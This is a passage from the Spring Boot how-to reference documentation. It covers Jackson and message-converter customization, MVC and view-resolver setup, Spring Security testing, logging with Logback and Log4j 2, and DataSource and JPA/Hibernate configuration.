auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each and Spring Boot will register them transparently to the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a\n`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. You can override `GroovyMarkupViewResolver` by providing a bean of the\nsame name.\n\nFor more detail, see the following sections:\n\n* {sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user\nthat has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and\nthis can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true`\non the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\n\nSpring Boot offers a number of starters that work with HTTP clients. This section answers\nquestions related to using them.\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,\nyou can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttp:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `${PID}`: The current process ID.\n* `${LOG_FILE}`: Whether `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}`: Whether `logging.path` (representing a directory for\n log files to live in) was set in Boot's external configuration.\n* `${LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set\n in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the DataSource that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This\nexample uses a more generic `configuration` sub namespace as the example does not support\nmultiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence to anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. Rather than configuring Hibernate to lookup the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the\ndefault. To make it easy to do, you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot. Alternatively, you can just the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn 